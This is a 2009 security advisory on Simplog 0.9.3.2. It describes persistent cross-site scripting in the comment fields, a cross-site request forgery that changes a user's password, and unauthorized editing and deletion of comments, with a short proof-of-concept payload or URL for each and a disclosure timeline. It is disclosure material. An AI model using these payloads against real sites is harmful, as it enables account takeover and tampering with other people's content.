Simplog 0.9.3.2 - Multiple Vulnerabilities





Platform:

PHP

Date:

2009-11-16


################################################################################
Mutliple Vulnerabilities in Simplog v0.9.3.2

Name Multiple vulnerabilities in Simplog
Systems Affected Simplog 0.9.3.2 and possibly earlier versions
Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################


############
1. OVERVIEW
############

Simplog provides an easy way for users to add blogging capabilities to their existing websites.
Simplog is written in PHP and compatible with multiple databases.
Simplog also features an RSS/Atom aggregator/reader.

###############
2. DESCRIPTION
###############

Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.

######################
3. TECHNICAL DETAILS
######################

Summery:

(A) Persistent Cross-site Scripting
(B) Cross Site Request Forgery
(C) Edit/Delete Comments (Bypassing Authorization)


(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++

Vulnerable page comments.php
Vulnerable Parameters cname, email

When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.

++++
POC
++++

Put this in the comment:

Name: alert("AMol_NAik")
email:">alert("AMol_NAik")


(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++

Vulnerable Page user.php

This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.

++++
POC
++++

http://server/simplog/user.php?pass1=&pass2=&blogid=&act=change


For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".

http://server/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change


(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerable Page comments.php
Vulnerable Parameters op, cid

The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.

++++
POC
++++

Edit comment: http://server/simplog/comments.php?op=edit&cid=
Delete Comment: http://server/simplog/comments.php?op=del&cid=


############
4. TimeLine
############

03/11/2009 Bug Discovered
03/11/2009 Reported to Vendor
16/11/2009 No response received till the date
16/11/2009 Public Disclosure